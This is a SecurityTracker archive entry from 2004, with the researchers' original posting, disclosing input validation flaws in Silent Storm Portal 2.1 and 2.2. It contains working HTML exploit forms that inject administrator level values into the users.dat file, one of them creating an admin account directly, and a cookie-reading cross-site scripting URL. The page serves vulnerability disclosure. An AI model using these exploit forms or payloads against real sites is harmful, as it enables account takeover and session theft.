SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Silent Storm Portal Vendors:   silent-storm.co.uk
Silent Storm Portal Input Validation Errors Let Remote Users Gain Administrative Privileges and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1011470
SecurityTracker URL:  http://securitytracker.com/id/1011470
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 30 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.1, 2.2
Description:   Some vulnerabilities were reported in Silent Storm Portal. A remote user can obtain administrative privileges on the target application. A remote user can also conduct cross-site scripting attacks.

CHT Security Research reported that 'profile.php' does not properly validate user-supplied input. A remote user can submit specially crafted input to inject data into the 'users.dat' file to create a new user account with administrative privileges.

A demonstration exploit form is provided:

<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>

It is also reported that the software does not filter HTML code from user-supplied input in the 'module' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Silent Storm Portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

The original advisory is available at:

http://www.cyberspy.org/gam/silentstorm.multiple

Impact:   A remote user can obtain administrative privileges on the target application.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Silent Storm Portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.silent-storm.co.uk/ssp/index.php?module=../../Home (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple Vulnerabilities in Silent Storm Portal




#####################################
# CHT Security Research-2004        #
# http://www.CyberSpy.Org           #
# Turkey                      	    #
#####################################

Software:
Silent Storm Portal

Web Site:
http://www.silent-storm.co.uk/ssp/

Affected Version(s):
2.1,2.2

Description:
Silent Storm Portal is a PHP based portal system.It requires PHP4 or above.no MySQL needed.

Multiple Vulnerabilities in Silent Storm Portal:

Cross-Site Scripting vulnerability : 

Silent Storm Portal is prone to cross-site scripting attacks. It is possible to construct a link containing arbitrary script code
 to a website running Silent Storm Portal . When a user browses the link, the script code will be executed on the user in the context
 of the site using the Portal.The impact of this issue is that the attacker is able to hijack a legitimate web user's session, by
 stealing cookie-based authentication credentials.

Demonstration:

http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E


Unauthorized Administrative Access Vulnerability :

Silent Storm Portal stores all account informations,usernames and passwords in the users.dat file.This file is a plaintext file stored
 in the db directory.There is a flaw in profile.php file which could allow normal members to gain escalated privileges.The issue occurs
 due to insufficient sanitization of user-supplied data that may allow escape character sequences to be injected into the users.dat
 file.Submitting an e-mail address with an evil level code via profile module will inject Administrator level value into the database
 file and will escalate the current level to Administrator privileges.

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )

examples from the database file:

before exploiting:

evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>
			              Level
				   Normal User
after exploiting:

evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
			         Injected Level
				  Administrator

You'll get "Updated Your Profile Sucessfuly !" message after executing the exploit.html
That's All! logout and re-login with your username/password.
click to "Admin Panel" link. ( index.php?module=../../apanel )
Now you have full Administrator privileges.

Here is another code that creates an Administrator account directly on the victim's portal:

---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type=hidden name="ema" value="any@mail.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---

----------------------------
The original article can be found at: 
http://www.CyberSpy.Org
(Turkish Language)

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC